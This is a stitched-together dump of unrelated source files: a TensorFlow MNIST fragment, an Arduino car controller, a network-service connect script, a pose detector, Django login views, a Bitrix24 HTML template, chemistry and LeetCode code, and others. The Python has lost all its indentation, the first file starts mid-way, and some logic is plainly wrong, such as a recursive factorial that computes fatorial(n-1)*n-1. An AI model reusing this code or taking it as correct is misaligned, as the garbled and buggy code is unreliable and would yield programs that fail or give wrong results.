# output_ = sess.run(outputs, feed_dict={x: batch_xs, y: batch_ys})
# print('outputs shape:', np.shape(output_))
# print(outputs)
# print('states shape:', np.shape(states))
# print(states)
# y_pred = sess.run(pred, feed_dict={x: batch_xs, y: batch_ys})
# print('输出的y:\n', y_pred.shape, '\n')
#
# print(batch_xs.shape)
_, c = sess.run([optimizer, cost], feed_dict={x: batch_xs, y: batch_ys})
avg_cost += c / total_batch
if (epoch + 1) % display_step == 0:
print('epoch= ', epoch+1, ' cost= ', avg_cost)
print('finished')
correct_prediction = tf.equal(tf.argmax(pred, 1), tf.argmax(y, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
print('test accuracy: ', accuracy.eval({x: mnist.test.images, y: mnist.test.labels}))
# print('train accuracy: ', accuracy.eval({x: mnist.train.images, y: mnist.train.labels}))
|
# CarControl.py
#
from serial import Serial
from threading import Timer
class CarControl:
def __init__(self, comport):
self.comport = comport
self.cars = {
1: {'x-servo':1, 'y-servo':2},
2: {'x-servo':3, 'y-servo':4},
3: {'x-servo':5, 'y-servo':6}
}
self.directions = {
'S': {'x-servo-val':90, 'y-servo-val':90},
'F': {'x-servo-val':120, 'y-servo-val':90},
'B': {'x-servo-val':60, 'y-servo-val':90},
'FL': {'x-servo-val':120, 'y-servo-val':70},
'FR': {'x-servo-val':120, 'y-servo-val':100},
'BL': {'x-servo-val':60, 'y-servo-val':100},
'BR': {'x-servo-val':60, 'y-servo-val':70}
}
self.arduino = Serial(self.comport, 115200, timeout=1)
def move(self, car, direction, duration=500):
xservo = self.cars[car]['x-servo']
yservo = self.cars[car]['y-servo']
xval = self.directions[direction]['x-servo-val']
yval = self.directions[direction]['y-servo-val']
# steer first...
#print "xservo %d %d" % (xservo, xval)
self.moveServo(xservo, xval)
# then hit the gas!
#print "yservo %d %d" % (yservo, yval)
self.moveServo(yservo, yval)
# stop the car after given duration
print "stopping after %d" % (duration)
t = Timer(10 + float(duration)/1000, self.stop, [car])
t.start()
def stop(self, car):
print "stopping car %d" % car
xservo = self.cars[car]['x-servo']
yservo = self.cars[car]['y-servo']
xcentre = self.directions['S']['x-servo-val']
ycentre = self.directions['S']['y-servo-val']
self.moveServo(yservo, ycentre)
self.moveServo(xservo, xcentre)
def moveServo(self, servo, angle):
'''
Moves the specified servo to the supplied angle.
Arguments:
servo
the servo number to command, an integer from 1-6
angle
the desired servo angle, an integer from 0 to 180
(e.g.) >>> servo.move(2, 90)
... # "move servo #2 to 90 degrees"
'''
if (0 <= angle <= 180):
self.arduino.write(chr(255))
self.arduino.write(chr(servo))
self.arduino.write(chr(angle))
print "servo %d: %d" % (servo,angle)
else:
print "Servo angle must be an integer between 0 and 180.\n"
|
#!/usr/bin/python
import pprint, sys, time
import dbus, flimflam
if (len(sys.argv) < 2):
print "Usage: %s <service_name>" % (sys.argv[0])
sys.exit(1)
flim = flimflam.FlimFlam(dbus.SystemBus())
timeout = time.time() + 30
while time.time() < timeout:
service = flim.FindElementByPropertySubstring('Service',
'Name',
sys.argv[1])
if service:
break
time.sleep(.5)
if service is None:
print "Unknown service %s" % sys.argv[1]
sys.exit(2)
(success, diagnostics) = flim.ConnectService(service=service)
print 'Success:', success
pprint.pprint(diagnostics)
|
# Løsning basert på gradient decent
from numpy import *
def f(k, n):
f = e**(k/n) - 1
return f
def E(X, n):
return abs(f(X[0], n) + f(X[1], n) + f(X[2], n) + f(X[3], n) - pi)
'''
def E_grad(X, n):
s = sign(f(X[0], n) + f(X[1], n) + f(X[2], n) + f(X[3], n) - pi)
pDE_a = (s*e**(X[0]/n)/n)
pDE_b = (s*e**(X[1]/n)/n)
pDE_c = (s*e**(X[2]/n)/n)
pDE_d = (s*e**(X[3]/n)/n)
return array([pDE_a, pDE_b, pDE_c, pDE_d])
'''
def E_grad(X, n):
h = 1
x1 = (f(X[0]+h, n) - f(X[0]-h, n))/(2*h)
x2 = (f(X[1]+h, n) - f(X[1]-h, n))/(2*h)
x3 = (f(X[2]+h, n) - f(X[2]-h, n))/(2*h)
x4 = (f(X[3]+h, n) - f(X[3]-h, n))/(2*h)
return array([x1, x2, x3, x4])
def norm(X):
return sqrt(X[0]**2 + X[1]**2 + X[2]**2 + X[3]**2)
n = 200
gamma = 10
Xold = array([1, 2, 3, 4])
Xnew = array([1, 2, 3, 4])
while E(Xold, n) > 0.000001:
Xold = Xnew
Xnew = Xold - gamma*E_grad(Xold, n)
print(Xnew)
print(Xnew)
#print(E_grad(array([1, 1, 900, 1]), 200))
'''
i = 4
for a in range(i):
for b in range(i):
for c in range(i):
for d in range(i):
print(a, b, c, d)
print(E(array([a, b, c, d]), 200))
print()
'''
|
from services.detection.tf_pose.networks import get_graph_path, model_wh
from services.detection.tf_pose.estimator import TfPoseEstimator
from services.detection.fsanet_pytorch.utils import draw_axis
from services.detection.fsanet_pytorch.face_detector import FaceDetector
import onnxruntime
import torch
import tensorflow as tf
import cv2
import numpy as np
import logging
from datetime import datetime
from pathlib import Path
import sys
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
logger = logging.getLogger('Detection testing log.')
logger.setLevel(logging.ERROR)
class Detector():
'''
Human and face detection with tf-pose-estimation and headpose-fsanet-pytorch.
tf-pose using tf2.0
tf-pose-estimation: https://github.com/ildoonet/tf-pose-estimation
tf-pose with tf2.0: https://medium.com/@gsethi2409/pose-estimation-with-tensorflow-2-0-a51162c095ba
headpose-fsanet-pytorch: https://github.com/omasaht/headpose-fsanet-pytorch
'''
def __init__(
self,
fsa_net_path=os.path.join(
'src', 'services', 'detection', 'fsanet_pytorch', 'pretrained'),
tf_pose_type='mobilenet_thin',
target_size=(640, 480),
resize_out_ratio=4.0
):
self.fsa_net_path = fsa_net_path
self.tf_pose_type = tf_pose_type
self.target_size = target_size
# import model
self.face_d = FaceDetector()
self.fsa_sess1 = onnxruntime.InferenceSession(
os.path.join(
self.fsa_net_path,
'fsanet-1x1-iter-688590.onnx'
)
)
self.fsa_sess2 = onnxruntime.InferenceSession(
os.path.join(
self.fsa_net_path,
'fsanet-var-iter-688590.onnx'
)
)
self.tf_pose = TfPoseEstimator(
get_graph_path(self.tf_pose_type),
target_size=self.target_size,
trt_bool='F'
)
self.tf_pose_resize_out_ratio = resize_out_ratio
def resize(self, image, target_size=(640, 480), method=cv2.INTER_NEAREST):
return cv2.resize(
image,
target_size,
interpolation=method
)
def __detect(self, image):
w, h = model_wh(str(self.target_size[0])+'x'+str(self.target_size[1]))
# tf-pose estimator detect
humans = self.tf_pose.inference(
image,
resize_to_default=(w > 0 and h > 0),
upsample_size=self.tf_pose_resize_out_ratio
)
# fsa-net detect
# 1. face detect
face_bb = self.face_d.get(image)
# 2. yaw, pitch, roll detection with headpose
face_rotation = {}
for index, (x1, y1, x2, y2) in enumerate(face_bb):
face_roi = image[y1:y2+1, x1:x2+1]
# preprocess headpose model input
face_roi = cv2.resize(face_roi, (64, 64))
face_roi = face_roi.transpose((2, 0, 1))
face_roi = np.expand_dims(face_roi, axis=0)
face_roi = (face_roi-127.5)/128
face_roi = face_roi.astype(np.float32)
# get headpose
res1 = self.fsa_sess1.run(["output"], {"input": face_roi})[0]
res2 = self.fsa_sess2.run(["output"], {"input": face_roi})[0]
yaw, pitch, roll = np.mean(np.vstack((res1, res2)), axis=0)
face_rotation.update({index: [yaw, pitch, roll]})
return humans, face_rotation
def detect(self, image):
return self.__detect(image)
def draw(self, image, humans, face_rotation):
image = TfPoseEstimator.draw_humans(
image, humans,
imgcopy=False
)
image = draw_axis(
image,
face_rotation[0],
face_rotation[1],
face_rotation[2],
tdx=image.shape[0], \
# tdx=(x2-x1)//2+x1, \
tdy=10, \
# tdy=(y2-y1)//2+y1, \
size=50
)
return image
if __name__ == "__main__":
detection = Detector()
image = cv2.imread(os.path.join('src', 'services',
'detection', 'test', 'input', 'apink1.jpg'))
image = detection.resize(image)
humans, face_rotation = detection.detect(image)
image = detection.draw(image, [humans[0]], face_rotation[0])
cv2.imwrite(os.path.join('src', 'services', 'detection',
'test', 'output', 'apink1.jpg'), image)
|
#QUESTAO3
print("Funções recursivas são funções que chamam a si mesma de forma que, para resolver um problema maior, utiliza a recursão para chegar as unidades básicas do problema em questão e então calcular o resultado final.\n Exemplo:")
def fatorial(n):
if (n==1):
return (n)
return fatorial(n-1)*n-1
print(fatorial(5))
|
# construct a relative transformation
from importlib import resources
import numpy as np
from timemachine.fe.rbfe import setup_initial_states
from timemachine.fe.single_topology import SingleTopology
from timemachine.fe.utils import get_romol_conf, read_sdf
from timemachine.ff import Forcefield
def get_hif2a_ligand_pair_single_topology():
"""Return two ligands from hif2a and the manually specified atom mapping"""
with resources.path("timemachine.testsystems.data", "ligands_40.sdf") as path_to_ligand:
all_mols = read_sdf(str(path_to_ligand))
mol_a = all_mols[1]
mol_b = all_mols[4]
core = np.array(
[
[0, 0],
[2, 2],
[1, 1],
[6, 6],
[5, 5],
[4, 4],
[3, 3],
[15, 16],
[16, 17],
[17, 18],
[18, 19],
[19, 20],
[20, 21],
[32, 30],
[26, 25],
[27, 26],
[7, 7],
[8, 8],
[9, 9],
[10, 10],
[29, 11],
[11, 12],
[12, 13],
[14, 15],
[31, 29],
[13, 14],
[23, 24],
[30, 28],
[28, 27],
[21, 22],
]
)
return mol_a, mol_b, core
def get_relative_hif2a_in_vacuum():
mol_a, mol_b, core = get_hif2a_ligand_pair_single_topology()
ff = Forcefield.load_default()
rfe = SingleTopology(mol_a, mol_b, core, ff)
temperature = 300
seed = 2022
lam = 0.5
host = None # vacuum
initial_states = setup_initial_states(rfe, host, temperature, [lam], seed)
potentials = initial_states[0].potentials
sys_params = [np.array(u.params, dtype=np.float64) for u in potentials]
coords = rfe.combine_confs(get_romol_conf(mol_a), get_romol_conf(mol_b))
masses = np.array(rfe.combine_masses())
return potentials, sys_params, coords, masses
|
template = """<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<script>var token = "{{ token }}";</script>
<script src="//api.bitrix24.com/api/v1/"></script>
<script>
function runApplication (currentValues) {
currentValues = currentValues || {}
var form = document.querySelector('form'),
elements = form.elements,
initialized = false;
function getFormValues () {
return Array.prototype.map.call(elements, function (element) {
return [element.name, element.value];
}).reduce(function (result, item) {
result[item[0]] = item[1];
return result;
}, {});
}
function getVisibility () {
var autoCallOn = getFormValues().auto_call_on;
return {
employee_id: autoCallOn == 'employee',
scenario_id: autoCallOn == 'scenario',
virtual_number_numb: autoCallOn != 'virtual_number',
virtual_number: autoCallOn == 'virtual_number'
};
}
function saveSettings () {
if (!initialized) {
return;
}
var values = getFormValues();
Object.entries(getVisibility()).forEach(function (args) {
var name = args[0],
visibility = args[1];
!visibility && (values[name] = '');
});
BX24.placement.call('setPropertyValue', values);
}
function updateVisibility () {
Object.entries(getVisibility()).forEach(function (args) {
var name = args[0],
visibility = args[1];
document.querySelector('[name=' + name + ']').closest('div').style.display = visibility ? 'block' : 'none';
});
}
function request (args) {
var url = '/api/v1/' + args.url,
callback = args.callback || function () {},
request = new XMLHttpRequest();
request.addEventListener('load', function () {
var data;
try {
data = JSON.parse(this.responseText)
} catch (e) {
data = null;
}
callback((data || {}).data);
});
request.addEventListener('error', function () {
callback(null);
});
request.open('GET', url);
request.setRequestHeader('Authorization', 'Bearer ' + token);
request.send();
}
function createOption (args) {
var value = args.value,
text = args.text,
selected = args.selected;
return '<option ' + (selected ? 'selected ' : '') + 'value="' + value + '">' + text + '</option>';
}
[{
names: ['employee_id'],
dataUrl: 'users',
getText: function (record) {
return ['last_name', 'first_name'].map(function (name) {
return record[name];
}).filter(function (value) {
return value;
}).join(' ');
}
}, {
names: ['virtual_number_numb', 'virtual_number'],
dataUrl: 'number_capacity?with_scenario=1',
valueField: 'numb',
displayField: 'numb'
}, {
names: ['scenario_id'],
dataUrl: 'scenario',
displayField: 'name'
}].forEach(function (params) {
var names = params.names;
var selectFields = document.querySelectorAll(names.map(function (name) {
return 'select[name=' + name + ']'
}).join(','));
selectFields.forEach(function (selectField) {
selectField.disabled = true
});
function createOptions (data) {
var isEmpty = !data || !data.length;
selectFields.forEach(function (selectField) {
var options = isEmpty ? [createOption({
value: '',
text: '...'
})] : [];
(data || []).forEach(function (record) {
var value = record[params.valueField || 'id'];
options.push(createOption({
value: value,
text: params.getText ? params.getText(record) : record[params.displayField],
selected: currentValues[selectField.name] == value
}))
});
selectField.innerHTML = options.join('');
!isEmpty && (selectField.disabled = false);
});
saveSettings();
}
createOptions();
request({
url: params.dataUrl,
callback: createOptions
});
});
currentValues.employee_message && (document.querySelector('textarea').innerHTML = currentValues.employee_message);
const autoCallOnSelect = document.querySelector('select[name="auto_call_on"]');
autoCallOnSelect.addEventListener('change', updateVisibility);
autoCallOnSelect.value = currentValues.auto_call_on || 'personal_manager';
Array.prototype.forEach.call(elements, function (element) {
(element.nodeName.toLowerCase() == 'textarea' ? ['keyup', 'change'] : ['change']).forEach(function (eventName) {
element.addEventListener(eventName, saveSettings);
});
});
form.style.display = 'none';
BX24.init(function () {
initialized = true;
saveSettings();
form.style.display = 'block';
});
updateVisibility();
}
</script>
<style>
select, button {
height: 30px;
background: #fff;
border: 1px solid #000;
}
select[disabled], button[disabled] {
cursor: not-allowed;
color: #ccc;
}
select, textarea {
width: 100%;
box-sizing: border-box;
}
textarea {
height: 100px;
padding: 10px;
}
label {
margin-bottom: 15px;
display: block;
}
body {
padding: 20px;
}
body, textarea {
font-family: sans-serif;
font-size: 14px;
}
div {
margin-bottom: 25px;
}
</style>
<script>document.addEventListener("DOMContentLoaded", function () {runApplication({{ current_values|safe }});})</script>
</head>
<body>
<form>
<div>
<label>{{ properties.auto_call_on.NAME }}:</label>
<select name="auto_call_on">
{% for key, value in properties.auto_call_on.OPTIONS.items() %}
<option value="{{ key }}">{{ value }}</option>
{% endfor %}
</select>
</div>
<div>
<select name="employee_id"></select>
</div>
<div>
<select name="virtual_number"></select>
</div>
<div>
<select name="scenario_id"></select>
</div>
<div>
<label>{{ properties.virtual_number_numb.NAME }}:</label>
<select name="virtual_number_numb"></select>
</div>
<div>
<label>{{ properties.employee_message.NAME }}:</label>
<textarea name="employee_message"></textarea>
</div>
</form>
</body>
</html>
"""
|
"""
Graph State
===========
"""
from collections import defaultdict
import numpy as np
class _GraphState:
"""
The topology graph of a molecule under construction.
"""
__slots__ = [
"_vertex_building_blocks",
"_vertices",
"_edges",
"_lattice_constants",
"_vertex_edges",
"_num_building_blocks",
]
def __init__(
self,
building_block_vertices,
edges,
lattice_constants,
):
"""
Initialize a :class:`._GraphState` instance.
Parameters
----------
building_block_vertices : :class:`dict`
Maps each :class:`.BuildingBlock` to be placed, to a
:class:`tuple` of :class:`.Vertex` instances, on which
it should be placed.
edges : :class:`tuple` of :class:`.Edge`
The edges which make up the topology graph.
lattice_constants : :class:`tuple` of :class:`numpy.ndarray`
A :class:`numpy.ndarray` for each lattice constant.
Can be an empty :class:`tuple` if the topology graph is
not periodic.
"""
self._vertex_building_blocks = {
vertex.get_id(): building_block
for building_block, vertices in building_block_vertices.items()
for vertex in vertices
}
self._num_building_blocks = {
building_block: len(vertices)
for building_block, vertices in building_block_vertices.items()
}
self._vertices = {
vertex.get_id(): vertex
for vertices in building_block_vertices.values()
for vertex in vertices
}
self._edges = edges
self._lattice_constants = tuple(
map(
np.array,
lattice_constants,
)
)
self._vertex_edges = self._get_vertex_edges()
def _get_vertex_edges(self):
"""
Get the edges connected to each vertex.
Returns
-------
:class:`dict`
Maps the id of every vertex to a :class:`tuple` of
:class:`.Edge` instances connected to it.
"""
vertex_edges = defaultdict(list)
for edge in self._edges:
if edge.is_periodic():
for vertex_id in edge.get_vertex_ids():
periodic_edge = self._get_periodic_edge(
edge=edge,
reference=vertex_id,
)
vertex_edges[vertex_id].append(periodic_edge)
else:
for vertex_id in edge.get_vertex_ids():
vertex_edges[vertex_id].append(edge)
return vertex_edges
def _get_periodic_edge(self, edge, reference):
"""
Get an :class:`.Edge`, with its position correctly set.
For a periodic edge, its correct position is not at the
midpoint of the two vertices it connects. Instead, its
correction position is different for each vertex. The get the
correct position from the perspective of *vertex1*, *vertex2*
must first be shifted to its periodic position, and only then
can the midpoint of the vertices be used to get the edge
position. An analogous calculation must be done to get the
position of the edge from the perspective of *vertex2*.
Parameters
----------
edge : :class:`.Edge`
The edge whose periodic position must be set.
reference : :class:`int`
The id of the vertex, relative to which the edge position
is being calculated.
Returns
-------
:class:`.Edge`
A clone of `edge`, shifted to have the correct periodic
position relative to `reference`.
"""
vertex1 = self._vertices[reference]
id1, id2 = edge.get_vertex_ids()
vertex2 = self._vertices[id1 if reference == id2 else id2]
direction = 1 if reference == id1 else -1
periodicity = np.array(edge.get_periodicity())
end_cell = vertex1.get_cell() + direction * periodicity
cell_shift = end_cell - vertex2.get_cell()
shift = sum(
axis_shift * constant
for axis_shift, constant in zip(
cell_shift,
self._lattice_constants,
)
)
position = (
vertex2.get_position() + shift + vertex1.get_position()
) / 2
return edge.with_position(position)
def clone(self):
"""
Get a clone.
Returns
-------
:class:`._GraphState`
The clone. Has the same type as the original instance.
"""
clone = self.__class__.__new__(self.__class__)
clone._vertex_building_blocks = dict(
self._vertex_building_blocks
)
clone._vertices = dict(self._vertices)
clone._vertex_edges = dict(self._vertex_edges)
clone._edges = self._edges
clone._lattice_constants = tuple(
map(
np.array,
self._lattice_constants,
)
)
clone._num_building_blocks = dict(self._num_building_blocks)
return clone
def get_building_block(self, vertex_id):
"""
Get the building block to be placed on a given vertex.
Parameters
----------
vertex_id : :class:`int`
The id of the vertex, on which the building block is to
be placed.
Returns
-------
:class:`.BuildingBlock`
The building block.
"""
return self._vertex_building_blocks[vertex_id]
def get_vertices(self, vertex_ids=None):
"""
Yield the topology graph vertices.
Parameters
----------
vertex_ids : :class:`iterable` of :class:`int`, optional
The ids of vertices to yield. If ``None``, all vertices
will be yielded. Can be a single :class:`int` if a
single vertex is to be yielded.
Yields
------
:class:`.Vertex`
A vertex.
"""
if vertex_ids is None:
vertex_ids = range(len(self._vertices))
elif isinstance(vertex_ids, int):
vertex_ids = (vertex_ids,)
for vertex_id in vertex_ids:
yield self._vertices[vertex_id]
def get_num_vertices(self):
"""
Get the number of vertices in the topology graph.
Returns
-------
:class:`int`
The number of vertices in the topology graph.
"""
return len(self._vertices)
def get_edge(self, edge_id):
"""
Get an edge.
Parameters
----------
edge_id : :class:`int`
The id of an edge.
Returns
-------
:class:`.Edge`
An edge.
"""
return self._edges[edge_id]
def get_num_edges(self):
"""
Get the number of edges in the topology graph.
Returns
-------
:class:`int`
The number of edges.
"""
return len(self._edges)
def get_lattice_constants(self):
"""
Get the lattice constants of the state.
Returns
-------
:class:`tuple` of :class:`numpy.ndarray`
The lattice constants.
"""
return tuple(map(np.array, self._lattice_constants))
def get_edges(self, vertex_id):
"""
Get the edges connect to a vertex.
Parameters
----------
vertex_id : class:`int`
The id of a vertex.
Returns
-------
:class:`tuple` of :class:`.Edge`
The connected edges.
"""
return self._vertex_edges[vertex_id]
def _with_vertices(self, vertices):
"""
Modify the instance.
"""
self._vertices = {
vertex.get_id(): vertex for vertex in vertices
}
return self
def with_vertices(self, vertices):
"""
Returns a clone holding `vertices`.
Parameters
----------
vertices : :class:`iterable` of :class:`.Vertex`
The vertices the clone should hold.
Returns
-------
:class:`._GraphState`
The clone. Has the same type as the original instance.
"""
return self.clone()._with_vertices(vertices)
def _with_lattice_constants(self, lattice_constants):
"""
Modify the instance.
"""
self._lattice_constants = tuple(
map(
np.array,
lattice_constants,
)
)
return self
def with_lattice_constants(self, lattice_constants):
"""
Return a clone holding the `lattice_constants`.
Parameters
----------
lattice_constants : :class:`tuple` of :class:`numpy.ndarray`
The lattice constants of the clone. Requires 3 arrays of
size``(3, )``.
Returns
-------
:class:`._GraphState`
The clone holding the new lattice constants. Has the same
type as the original instance.
"""
return self.clone()._with_lattice_constants(lattice_constants)
def get_num_building_block(self, building_block):
"""
Get the number of times `building_block` is present.
Parameters
----------
building_block : :class:`.BuildingBlock`
The building block whose frequency in the topology graph
is desired.
Returns
-------
:class:`int`
The number of times `building_block` is present in the
topology graph.
"""
return self._num_building_blocks[building_block]
def get_building_blocks(self):
"""
Yield the building blocks.
Building blocks are yielded in an order based on their
position in the topology graph. For two equivalent
topology graphs, but with different building blocks,
equivalently positioned building blocks will be yielded at the
same time.
Yields
------
:class:`.BuildingBlock`
A building block of the topology graph.
"""
yielded = set()
for vertex_id in range(max(self._vertex_building_blocks) + 1):
building_block = self._vertex_building_blocks[vertex_id]
if building_block not in yielded:
yielded.add(building_block)
yield building_block
|
from django.shortcuts import render
from .serializers import RegisterSerializer, LoginSerializer, UserSerializer
from rest_framework.generics import GenericAPIView
from rest_framework import status, permissions
from rest_framework.response import Response
from knox.models import AuthToken
from django.contrib.auth import get_user_model
class RegisterView(GenericAPIView):
serializer_class = RegisterSerializer
def post(self, request):
serializer = self.serializer_class(data = request.data)
if serializer.is_valid():
user = serializer.save()
return Response(self.serializer_class(user).data, status = status.HTTP_201_CREATED)
return Response(serializer.errors, status = status.HTTP_400_BAD_REQUEST)
class LoginView(GenericAPIView):
serializer_class = LoginSerializer
def post(self, request):
serializer = self.serializer_class(data = request.data)
if serializer.is_valid():
user = serializer.validated_data
return Response({'user':UserSerializer(user).data, \
'token':AuthToken.objects.create(user)[1]}, \
status=status.HTTP_200_OK)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class UserUpdateView(GenericAPIView):
serializer_class = UserSerializer
permission_classes = [permissions.IsAuthenticated,]
def put(self, request):
instance = get_user_model().objects.get(pk = request.user.id)
serializer = self.serializer_class(instance, data=request.data, \
partial=True)
if serializer.is_valid():
serializer.save()
return Response(serializer.data, status = status.HTTP_200_OK)
return Response(serializer.errors, status = status.HTTP_400_BAD_REQUEST)
|
from base.element_field import ElementField
from dataclasses import dataclass
@dataclass
class Water(ElementField):
img = 'C:/Users/Данагуль/Desktop/текущее/ООЯ и С/game/image/water1.png'
|
# Copyright (c) 2020 by BionicDL Lab. All Rights Reserved.
# !/usr/bin/python
# -*- coding:utf-8 -*-
from setuptools import setup, find_packages
setup(
name='DeepClaw',
version='1.0.3',
description=(
'a reconfigurable benchmark of robotic hardware and task hierarchy for robot learning'
),
author='BionicDL',
author_email='sirgroup@outlook.com',
maintainer='Haokun W., Fang W., Xiaobo L., Yanglin H.',
maintainer_email='wanghk@mail.sustech.edu.cn',
license='MIT License',
packages=find_packages(),
platforms=["all"],
url='https://bionicdl-sustech.github.io/DeepClawBenchmark/',
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Topic :: Software Development :: Libraries'
],
install_requires=[
'numpy==1.18.2',
'matplotlib==3.2.1',
'opencv_contrib_python==4.1.2.30',
'PyYAML',
'pyrealsense2==2.34.0.1470',
'scipy==1.4.1',
'tqdm==4.46.0'
],
)
|
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
sns.set()
import scipy.optimize
df = pd.read_csv('data/bcd_gradient.csv', comment='#')
df = df.rename(columns={'fractional distance from anterior': 'x',
'[bcd] (a.u.)': 'I_bcd'})
plt.plot(df['x'], df['I_bcd'], marker='.', linestyle='none')
#definie a function for modeling the gradient
#use predefined function that the data should fit/we are testing
def gradient_model(x, I_0, a, lam):
"""model for bcd gradient: exponential decay plus background"""
#make sure program works
if np.any(np.array(x) <= 0):
raise RuntimeError('x must be positive')
if np.any(np.array([I_0, a, lam]) < 0):
raise RuntimeError('all parameters must be positive')
return a + I_0 * np.exp(-x / lam)
#runtime errors might arise if program starts to look at negative values
#even if given parameters are positive. It can wander off into regions
#that are not physically possible
#easly fix: use logs/exponentiation of the function - now won't get neg values
a_guess = 0.2
I_0_guess = 0.9 - 0.2
lam_guess = 0.25
#construct an array of our guesses for the parameters
p0 = np.array([I_0_guess, a_guess, lam_guess])
#will output parameters as an array
popt, _ = scipy.optimize.curve_fit(gradient_model, df['x'], df['I_bcd'], p0=p0)
#split up parameters from an array into a tuple
#plot the parameters into a smooth line
x_smooth = np.linspace (0, 1, 200)
I_smooth = gradient_model(x_smooth, *tuple(popt))
plt.plot(x_smooth, I_smooth, color='gray')
|
# 静态方法,类方法
class TestClass:
@classmethod
def clssMethod(cls):
print('class name is {},full name is {}'.format(cls.__name__, cls.__qualname__))
@staticmethod
def staticMethod():
print('this is static method')
def main():
TestClass.clssMethod()
TestClass.staticMethod()
a = 2
b = 3
a, b = b, a + b
print(a)
print(b)
if __name__ == '__main__':
main()
|
# 给出一个完全二叉树,求出该树的节点个数。
#
# 说明:
#
# 完全二叉树的定义如下:在完全二叉树中,除了最底层节点可能没填满外,其余每层节点数都达到最大值,并且最下面一层的节点都集中在该层最左边的若干位置。若最底层为第 h 层,则该层包含 1~ 2h 个节点。
#
# 示例:
#
# 输入:
# 1
# / \
# 2 3
# / \ /
# 4 5 6
#
# 输出: 6
#
# 来源:力扣(LeetCode)
# 链接:https://leetcode-cn.com/problems/count-complete-tree-nodes
# 著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。
# Definition for a binary tree node.
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
# solution 1: 直接递归, 但是没用到题目给到的完全二叉树的前提
# def countNodes(self, root: TreeNode) -> int:
# if not root:
# return 0
# return self.countNodes(root.left) + self.countNodes(root.right) + 1
# solution 2: 利用性质:完全二叉树最左叶子节点就是整个树的最大高度
def countNodes(self, root: TreeNode) -> int:
# 计算二叉树的最大高度, 利用性质:完全二叉树最左叶子节点就是整个树的最大高度
def max_deep(r: TreeNode) -> int:
if not r:
return 0
ans = 1
while r.left:
ans += 1
r = r.left
return ans
if not root:
return 0
# 不含根节点
max_deep_l = max_deep(root.left)
max_deep_r = max_deep(root.right)
# 相等,说明左子树是满的
if max_deep_l == max_deep_r:
return 1 + 2 ** max_deep_l - 1 + self.countNodes(root.right)
# 左边大,说明右子树是满的
if max_deep_l > max_deep_r:
return 1 + 2 ** max_deep_r - 1 + self.countNodes(root.left)
# 不会走到这里,完全二叉树的左子树高度 >= 右子树高度
return 1
|
from file_utils import file_contents
from pytokens import PYKEYWORDS
from type_simulation import TYPES
from nlparser import QueryParser
from type_simulation import guess_types, get_referencables
from canon_utils import fetch_queries_codes, parsable_code, reproducable_code, give_me_5
import ast
# import codegen
import re
import math
## Globals #####################################################################
ANNOT = "./gendata/all.anno"
CODE = "./gendata/all.code"
qparser = QueryParser()
## Utilities ###################################################################
# replace stuff in query that can be directly mapped
def canonicalize_query_part1(q, ref_type):
# for every string in ref types, check if we have a match in query
keys_ordered = [] if ref_type.keys() is None else sorted(ref_type.keys(), key = (lambda x: len(str(x))), reverse = True)
for k in keys_ordered:
if ref_type[k].startswith(TYPES['str']):
# double quoted
q = q.replace(" \"" + k + "\" ", " " + ref_type[k] + " ")
q = q.replace("\"" + k + "\" ", " " + ref_type[k] + " ")
q = q.replace(" \"" + k + "\"", " " + ref_type[k] + " ")
# single quoted
q = q.replace(" \'" + k + "\' ", " " + ref_type[k] + " ")
q = q.replace("\'" + k + "\' ", " " + ref_type[k] + " ")
q = q.replace(" \'" + k + "\'", " " + ref_type[k] + " ")
# represent "class . attribute" as class.attribute
# modify direct mapping
tokens = []
for t in q.split(" "):
if t not in PYKEYWORDS and ref_type.get(t.strip()) is not None:
tokens.append(ref_type[t.strip()])
else:
tokens.append(t)
q = " ".join(tokens)
# represent "class.attribute" as "class . attribute"
q = re.sub(r'([a-zA-Z])\.([a-zA-Z])', r'\1 . \2', q)
# modify direct mapping
tokens = []
for t in q.split(" "):
if t not in PYKEYWORDS and ref_type.get(t.strip()) is not None:
tokens.append(ref_type[t.strip()])
else:
tokens.append(t)
# new query
q = " ".join(tokens)
return q
# replace stuff in query based on pos tag of each token
def canonicalize_query_part2(q_pos, ref_type):
canon_query_tokens = []
for t, pos in q_pos:
# if the token belongs to a closed class; dont bother working it
if pos == "IN" or \
pos == "DT" or pos == "PDT" or pos == "WDT" or \
pos == "CC" or \
pos == "PRP" or pos == "PRP$" or pos == "WP" or pos == "WP$":
# keep token as-is
canon_query_tokens.append(t)
else:
# do we have a type for this noun/symbol ?
if ref_type.get(t.strip()) is not None:
canon_query_tokens.append(ref_type[t.strip()])
elif t.isdigit() and ref_type.get(int(t)) is not None:
canon_query_tokens.append(ref_type[int(t)])
else:
canon_query_tokens.append(t)
canon_query = " ".join(canon_query_tokens)
return canon_query
def canonicalize_code(code, ref_type):
try:
ast.parse(codegen.to_source(ast.fix_missing_locations(ast.parse(code.strip()))))
except:
return ""
# replace all identifiers in the code by TYPES as guessed
# parse code
root = ast.parse(code)
# walk the ast
for node in ast.walk(root):
# fix all identifiers
try:
# modify identifier with type
if ref_type.get(node.id) is not None:
node.id = ref_type[node.id]
except:
pass
## fix all attributes
try:
if ref_type.get(node.attr) is not None:
node.attr = ref_type[node.attr]
except:
pass
#3 fix all strings
try:
if isinstance(node, ast.Str):
if ref_type.get(node.s) is not None:
node.s = ref_type[node.s]
except:
pass
# fix all numbers
try:
if isinstance(node, ast.Num):
if ref_type.get(node.n) is not None:
node.n = ref_type[node.n]
except:
pass
# fix all alias
try:
if isinstance(node, ast.alias):
if ref_type.get(node.name) is not None:
node.name = ref_type[node.name]
except:
pass
# fix all function definitions
try:
if isinstance(node, ast.FunctionDef):
if ref_type.get(node.name) is not None:
node.name = ref_type[node.name]
except:
pass
# fix all class definitions
try:
if isinstance(node, ast.ClassDef):
if ref_type.get(node.name) is not None:
node.name = ref_type[node.name]
except:
pass
# fix all kword definitions
try:
if isinstance(node, ast.keyword):
if ref_type.get(node.arg) is not None:
node.arg = ref_type[node.arg]
except:
pass
